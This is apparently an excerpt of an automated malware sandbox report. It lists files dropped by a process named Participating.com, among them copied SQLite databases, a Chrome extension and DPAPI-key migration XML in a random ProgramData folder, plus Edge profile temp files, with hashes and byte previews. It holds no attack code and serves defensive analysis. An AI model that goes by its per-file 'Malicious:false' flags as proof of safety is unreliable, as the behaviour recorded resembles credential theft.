                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\ProgramData\479RQ1NOHDJM\USRIEC

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):155648
                                                                                                                                                                                                                                                                Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\ProgramData\479RQ1NOHDJM\WLFCTR

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4814
                                                                                                                                                                                                                                                                Entropy (8bit):7.909739359753065
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:K9DcEoTtp9feekTeBInbpzQK/XMEkyS+v86l1pjb5vFQIRwDYPc:K56zAMWpQK/cyz8A7jb5vGIqQc
                                                                                                                                                                                                                                                                MD5:6E6FE97CBC259DB47CD8423141CF35A3
                                                                                                                                                                                                                                                                SHA1:EE7D38E394FC87FBF2D4CBF7A45A56E270D667E1
                                                                                                                                                                                                                                                                SHA-256:1B2BA8FC90BA68CD057B9CAAFFC218EAD59A23E37F79192ED37D0C3A7A8BAB03
                                                                                                                                                                                                                                                                SHA-512:9FEE51391A289037D36344E22A49D5D4B863F30FFD19B4377D61E57EF389599F2F2790C41B6902C45BAF27B21A1F6916B6B6DF61A490A35592BE8CD1164E1966
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:Cr24....t.........0.."0...*.H.............0.........,.*i....9M..uEW....}.n..u..._3.08.:D.e]..'J...........l..)8`....:..P}........p..w(...v...Cm@....6..8...$._v....#a(.p..o:..=.....ef.C....M+.s.0g..@.'4.$ZN..e.....T.. ...F..;Sij[...&ZTH[.].D.z. ...A..<z...Ti....&..Z&u....D......\un.....................mR...B[.r..X...;.R..*Y...j...x...3.9.h...R.L....a....V%[.W_/v.A}.VV....H..1..s.9lH.7...M..^.|.C5...#..`...dJ.."..8....w......L../.........w....v.A....0..P....JU...~.-..[....K.d..i%.7....?].......1RiP..A.... ...b ...V2............f._~....IH.c.......0.."0...*.H.............0.........]......N..h...A..LY.*..%.s.....d..h#-/.U.I9..,.<.O1.)7.l.:W2..: ...E...2..s..W..T..|3.....W*S2N}.0g...T...b.q..wp.u....Z...)..2e}.r...!.u......@A..A..g.<.+:....m..[.....4..C&...*.."..}/9y%.....*..m..,.y...1...<=."eyI.G.@.3..=.....(.-...M..8A........q......:...L`\.q..?Rn.W/.\a...g...).....Q...8....*.*.J5.Z.~....0.Lt|...d....D......=...}A3bG.Ra.oyZ..BP..,t./.0...w..WA.p.

                                                                                                                                                                                                                                                                C:\ProgramData\479RQ1NOHDJM\XBS2D2V3W

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):51200
                                                                                                                                                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\ProgramData\479RQ1NOHDJM\Y58GDT

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4533
                                                                                                                                                                                                                                                                Entropy (8bit):5.1021772201912805
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:22X8PvMu0jPvJPM0UJl1/Qi9XexcElVOaBIpgmQlwYBwkbsgobVu:MUnZUb1xXMV37BhgVu
                                                                                                                                                                                                                                                                MD5:477F010FDB6BD5E5E57D6DEC5449F2FB
                                                                                                                                                                                                                                                                SHA1:73F9C03AF35B29EC2404BB70FEDC8C9ADADE74F6
                                                                                                                                                                                                                                                                SHA-256:2DBEDD5D4D6645E9ED45563FDB1DC42387EF24C9CF5D6A08EC3BE448073C4696
                                                                                                                                                                                                                                                                SHA-512:3C630BE96FC7FCD0036D254BA4D197AB31F37F6DAC411F8C78E624B0501D0205AF36CD5A29EC98D96D5D8D88EF2DBB2DF3A62C6F658A93302ECA500B8EC74F2F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:05:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:41:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-dpapi-keys-DL".. processorArchitecture="*".. publicKeyToken="".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <machineSpecific>.. <migXml>.. Check as this is only valid for down-level OS < than Windows V

                                                                                                                                                                                                                                                                C:\ProgramData\479RQ1NOHDJM\Z58QQI

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):45352
                                                                                                                                                                                                                                                                Entropy (8bit):0.3958094375125357
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:nQwlrNmQnc/vSpKll7DYMcCSG8JO8VFDYMcSzi:QcfITll4/jVG
                                                                                                                                                                                                                                                                MD5:CB5BF3CC261B4FE5AD758C20925373CD
                                                                                                                                                                                                                                                                SHA1:9EC0DE71E0263B7C0714043097DC2AE669C2F2BE
                                                                                                                                                                                                                                                                SHA-256:CEE51CA746542EEDE94535D76234D0D5F336EBB474AC70A577304C6F0651032E
                                                                                                                                                                                                                                                                SHA-512:852A02FE2981DAA552414D028D3F9689CF13B0082BC628F146171FC40BF4416C9E5623EA36693B42401346923CDDD703B2710A1C49C280E5A55334FB5AB72680
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:7....-..............{...l..@A..............{....8..S^.SQLite format 3......@ .......................................................................... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\ProgramData\479RQ1NOHDJM\ZMGDJE

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2062
                                                                                                                                                                                                                                                                Entropy (8bit):4.925445222257812
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:227+9gUKl+lxFcCY4/YBu4yTy3opyLyXyoyOyzylpjyA:22Sw+lxaWm3uCL9Gv
                                                                                                                                                                                                                                                                MD5:60145F68B1CF9440FA663820AE11CE4B
                                                                                                                                                                                                                                                                SHA1:10195A2926015E3024D769673E004AA60DFEC0A3
                                                                                                                                                                                                                                                                SHA-256:4805E01EB0C9B3DFEB6B754D4148588E2FB798734D9EDE20E53EB8E75158B64F
                                                                                                                                                                                                                                                                SHA-512:55D088040D25D4CBFF5A4210A85107666E628C67CA3134B0C836E135DBFE82AA4FA70185993E99D951307F7D159C1428B390727DA17EFEC5AA4BE9D799B96895
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="*".. name="Microsoft-Windows-Kerberos-Key-Distribution-Center-DL".. processorArchitecture="*".. publicKeyToken="$(Build.WindowsPublicKeyToken)".. version="0.0.0.0".. />.. <migration>.. <machineSpecific>.. <migXml xmlns="">.. Check as this is only valid for down-level OS < than Windows Vista ? -->.. <detects>.. <detect>.. <condition>MigXmlHelper.IsOSEarlierThan("NT", "6.0.0.0")</condition>.. </detect>.. </detects>.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\kdc\* [*]</pattern>.. </objectSet>.. </include>.. <exclude>.. <objectSet>.. <pattern type="Reg

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\2505fb19-d3cc-4609-afb3-561a6e3bc44a.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):45985
                                                                                                                                                                                                                                                                Entropy (8bit):6.087842589165287
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:xMkbJrT8IeQc5dXf2LmZ0KatZ1kndcQP8oYNxoZ20+YC1oAwWE7RTupzKscDX//n:xMk1rT8H1X6QYNGU0nIoAoRTuin
                                                                                                                                                                                                                                                                MD5:2610F08E59EF86EA1C7FDCB2C0A7EE00
                                                                                                                                                                                                                                                                SHA1:379594DB54E176B6C4B098C1BAC22B647EE581B5
                                                                                                                                                                                                                                                                SHA-256:6859A816C05AC617B73C90EB9BB1D5CB18A729493BCD65A50633B89A94707B45
                                                                                                                                                                                                                                                                SHA-512:B74E0DACAF6B86D0E5923DFF5B4DC1E78CC6B3FADF3B381B02E4F516F6CA54C0C233F38C51D68075EC8035D9EDE3B5311FDAB299E82A2F677DD8DC8849A5FD10
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"591353d8-ec7b-485c-920d-b24610ab4123"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6fc5d759-d601-41d2-babf-133f154820de.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):44703
                                                                                                                                                                                                                                                                Entropy (8bit):6.095581217496915
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xS9LmZ0KatZ1kndcQP8oKwWE7RTupzKscDX//NPC1os:z/Ps+wsI7yOcQKoRTuiVIos
                                                                                                                                                                                                                                                                MD5:D0458165629A3AF38D0BFBAD3531B052
                                                                                                                                                                                                                                                                SHA1:C159294EB45F2C1893D0CD07333553C63414A96B
                                                                                                                                                                                                                                                                SHA-256:F770EB0AB0531B022227D73C9C8A7C1F8F2F28306DF021655AB892267A6B02D8
                                                                                                                                                                                                                                                                SHA-512:4E4267FE6400D9684182601BDD48210CDE917AB5A699938CFCCB00C39BB527F10DF9E248153F333C62A001313A1A475AEA71D59466D176AC513C4B24D3628819
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\95b478f8-afdd-4f46-87d8-314bdeaeb3db.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):44621
                                                                                                                                                                                                                                                                Entropy (8bit):6.095774627812403
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kN9LmZ0KabdzwVzE9A8KwWE7RTupzKscDX//NPC1os:z/Ps+wsI7ynVTKoRTuiVIos
                                                                                                                                                                                                                                                                MD5:4F31614D5BAD6107E1D4A0AC9A0FA590
                                                                                                                                                                                                                                                                SHA1:3A4398712C2A5AD7ECE1D1D289043DED565E71F3
                                                                                                                                                                                                                                                                SHA-256:14C283B1735AD278F1E5F3954E93F9126CAA99D2199368EE729A604289E78579
                                                                                                                                                                                                                                                                SHA-512:63FDEDF1552BAA87F070435B1B7F6B5151B2418E064B6853B13F5DF7B199EF70B3868B1C96F396AFEB9FC232DC1B04650A89471C180DF1718EED15C088BC05AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\98ec293e-63c2-48ca-bc85-d927e3cc4d45.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):44170
                                                                                                                                                                                                                                                                Entropy (8bit):6.090597779558895
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kjCLmZt4+tR96hOxq4gFkFDlwWE7RTupzKscDX//NPm:z/Ps+wsI7ynttGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                MD5:F378B34C04A398BE5D454BF645831CAF
                                                                                                                                                                                                                                                                SHA1:EFC16B97C3C04F279D56872270FEE2CCD6D2B7FA
                                                                                                                                                                                                                                                                SHA-256:7CF14647DCA11B0084EA80A3632DF58F253660B94ACA2DAA6D7F2CECE97E8E4F
                                                                                                                                                                                                                                                                SHA-512:09D4646A44E063B8491F24046D01BE62BC2709BB5FCAEE9A83C99F05AB742FFBA7265D28D9F7788A6CF66A10DB011B40D92AC521C7C718138A386B5F40A2009D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):107893
                                                                                                                                                                                                                                                                Entropy (8bit):4.640132669903667
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7+:fwUQC5VwBIiElEd2K57P7+
                                                                                                                                                                                                                                                                MD5:18D8F6617A5020376CEDA06FB42C24D5
                                                                                                                                                                                                                                                                SHA1:F921FF53D8E1A065550AD835D89E550FDF448795
                                                                                                                                                                                                                                                                SHA-256:C0E1D05E90044F0F5810E83826BE6449D44234CD601668E5E041FE7F3B2CAB32
                                                                                                                                                                                                                                                                SHA-512:4FC6D77BDE79EB4EA56D8CFAEE5908C6D9233E65AD199C52A7425B76ECE9869466D3BE52E2A20B85FE50ABD712C57D8591DEBDDB9F3CBA45070E3233CC185DA4
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\e2329c37-ac51-4935-ba5a-bcc2ae01eabc.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):107893
                                                                                                                                                                                                                                                                Entropy (8bit):4.640132669903667
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7+:fwUQC5VwBIiElEd2K57P7+
                                                                                                                                                                                                                                                                MD5:18D8F6617A5020376CEDA06FB42C24D5
                                                                                                                                                                                                                                                                SHA1:F921FF53D8E1A065550AD835D89E550FDF448795
                                                                                                                                                                                                                                                                SHA-256:C0E1D05E90044F0F5810E83826BE6449D44234CD601668E5E041FE7F3B2CAB32
                                                                                                                                                                                                                                                                SHA-512:4FC6D77BDE79EB4EA56D8CFAEE5908C6D9233E65AD199C52A7425B76ECE9869466D3BE52E2A20B85FE50ABD712C57D8591DEBDDB9F3CBA45070E3233CC185DA4
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6760214C-194C.pma

